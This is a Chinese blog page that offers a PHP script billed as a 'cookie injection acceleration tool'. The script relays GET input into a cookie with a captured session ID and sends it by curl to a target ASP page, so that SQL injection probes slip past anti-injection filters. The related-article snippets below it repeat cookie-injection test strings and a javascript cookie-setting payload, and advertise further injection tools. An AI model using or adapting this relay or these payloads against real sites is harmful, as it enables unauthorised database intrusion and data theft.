cookies注入加速工具-PHP版

最新推荐文章于 2021-04-01 06:14:31 发布
最新推荐文章于 2021-04-01 06:14:31 发布
阅读量327 收藏
点赞数
文章标签: cookies 工具 url iframe header session

<?

error_reporting(7);
ini_set("max_execution_time",0);
$id=$_GET["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id); 
/*
articleId 换成注入页面的变量
例如 http://127.0.0.1/news.asp?articleId=123
注入变量就是articleId
*/
$inject="articleId";
//session是原来的COOKIE,可以自己抓包获取
$session ="ASPSESSIONIDSCBRDARD=AAGHANMCCHBPLDNPCIMFOLPI;";
$cookie=$inject."=".$id.";".$session;
//echo $cookie;
//referer 是引用页地址,一般和目标网站相同
$referer="http://127.0.0.1/";
//url是注入页面的地址,注意这里不要再把注入变量写进去
$url="http://127.0.0.1/news.asp";
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
//这一句是为了把图片和iframe的相对地址改为绝对地址,根据需要可以注释掉
$content=str_replace("src="","src="".$referer,$content);
echo $content;
?>

神经质的盛宴
关注
Cookie注入PHP页面)
海宝最美的博客
12-12 971
靶机地址:http://www.whalwl.top:8009 【2020年8月前有效】 一、准备工作: 在火狐浏览器上安装一个叫ModHeader的插件,请求头修改神器。 记住它的样子,然后就可以行动了。怎么弄插件,此插件怎么用,请大家自行百度,我是不会跑题的。 二、过程步骤: 1、判断是否存在注入 id=1’ //报错 id=1 and 1=1 //不报错 i...
COOKIES注入php-5教程及脚本
04-12
COOKIES注入php-5教程及脚本,配合程序PHP-5-WIN32使用,完成cookie注入攻击。 仅仅供学习使用,不可用于恶意攻击!恶意行为由下载者个人承担!
cookie注入工具php源码)
02-23
cookie注入工具php源码)cookie注入工具php源码)
cookie 注入 php,PHPweb建站系统cookies注入漏洞
weixin_34792357的博客
04-01 346
该楼层疑似违规已被系统折叠隐藏此楼查看此楼漏洞页面member/post.php view source print? 01
ASP实现cookies注入加速工具
10-30
在上述的“ASP实现cookies注入加速工具”中,我们看到一个ASP脚本,其目标是实现一种利用cookies进行数据注入并提高处理速度的方法。以下是对这个脚本的详细解释: 1. **cookies注入**:Cookies是Web服务器存储在...
PHP教程learn-php-master.zip
最新发布
06-08
**PHP教程learn-php-master.zip** 是一个专门为学习PHP编程语言准备的资源包。这个压缩文件包含了一系列的学习材料,旨在帮助初学者和有一定基础的开发者掌握PHP的核心概念和技术。PHP(Hypertext Preprocessor)是...
php-practice:推出
02-13
PHP实践中,应掌握如何防止SQL注入、XSS攻击,以及如何正确使用 sessions 和 cookies,以保护用户数据。 9. MVC模式 Model-View-Controller(MVC)是一种流行的设计模式,很多PHP框架都采用这种模式。理解MVC的...
jodd-all-3.1.0java开发工具
11-04
"jodd-all-3.1.0 Java 开发工具包"是一个综合性的软件包,专为Java开发者设计,提供了一系列的实用工具和库,旨在简化和加速开发过程。这个工具包的核心是Jodd框架,它包含了许多模块,覆盖了从HTTP服务器到数据处理...
手工、工具分别实现cookie注入
weixin_34050005的博客
05-15 167
最开始的判断access类型的网站注入点可以用“1 and 1=1”来判断。 不过现在的网站基本上被挡住了。之后呢,可以考虑cookie注入。 Dim Tc_Post,Tc_Get,Tc_In,Tc_Inf,Tc_Xh '定义需要过滤的字串 Tc_In="'|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|...
Cookie在线注入工具
12-13
Cookie在线注入工具 Cookie注入
cookie在线注入工具
05-22
cookie在线注入工具cookie在线注入工具
POST、Cookie注入扫描和注入工具
03-11
功能慢全的,注入速度飞快!!! 应该会对注入者有所帮助
cookies注入工具,真的不错愕
12-26
cookies注入工具,很好很强大 cookies注入工具,很好很强大
cookies 注入必备中转工具
03-10
cookies 注入必备中转工具cookie注入利器 可以绕过防注入
cookies注入加速工具-ASP
神经质的盛宴的专栏
11-18 5030
Str="xxxid="&escape(request("FK")) Url="http://xxx.chinaxxx.com/injection.asp" response.write PostData(Url,Str) Function PostData(PostUrl,PostCok)  Dim Http Set Http = Server.CreateObject("msxml2
cookie注入 php,cookies注入加速工具-PHP
weixin_36476970的博客
03-10 180
cookies注入加速工具-PHP/*cookies 注入加速 工具 PHPby 职业欠钱最近遇到一个挂了防注入的东东,COOKIE注入可行,不过手工注入太辛苦了,便四处寻找加速工具mika的工具依赖于SQL 错误开启的模式,而我遇到的这个是不显示错误信息的只能够盲注了。曾经找到一个ASP加速工具,其原理是将GET变量放到COOKIE里,然后调用XML去访问注入页面将返回信息显示出来这样...
cookie注入
Sea_Sand息禅
12-18 1033
有个靶场上的一道题,只要在id后面进行测试,立马弹窗,得不到任何信息。 这是个很好的WAF过滤,一个asp的网页,所以用cookie注入。 asp网页能用cookie注入php不能。 (语句执行在url地址栏里,每次注入语句执行后,都要访问对应的asp文件,才会出结果,就是刷新一下就行) javascript:alert(document.cookie="id="+escape("...
利用Cookies防止SQL注入攻击
在IT安全领域,"Cookies注入"是一个关键概念,特别是在Web应用程序开发中。Cookies是一种存储在客户端的小型文本文件,用于持久地跟踪用户状态或保存个性化信息。然而,由于它们可以被恶意用户利用来进行跨站脚本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值